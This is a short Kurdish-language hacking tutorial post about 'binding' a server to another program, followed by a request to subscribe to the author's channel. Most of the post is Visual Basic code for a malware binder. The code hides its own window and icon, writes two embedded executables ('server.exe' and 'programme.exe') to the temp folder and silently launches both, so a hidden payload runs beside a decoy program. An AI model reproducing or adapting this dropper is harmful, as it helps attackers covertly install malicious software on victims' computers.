دمج كردنی سێرڤه‌ر به‌بێ تێكدانی ته‌شفیری سێرڤه‌ر (هاكی كۆمپیوته‌ر)

سڵاو هاوڕێیان
له‌م وانه‌یه‌دا باس له‌ ده‌مج كردنی سێرڤه‌ر ئه‌كه‌ین

كۆدی ڤیژوال به‌یسك
Me.Hide()
Me.ShowInTaskbar = False
Me.ShowIcon = False
Opacity = 0
Dim red As String = IO.Path.GetTempPath + "server.exe"
IO.File.WriteAllBytes(red, My.Resources.server)
Process.Start(red)
Dim devil As String = IO.Path.GetTempPath + "programme.exe"
IO.File.WriteAllBytes(devil, My.Resources.programme)
Process.Start(devil)
End
به‌وهیوایه‌ی سودێكی هه‌بێ
x
چەنالەکەم سەبسکرایب بکەن 👇

هەڵۆ سەلمان
سەبسکرایبم بکە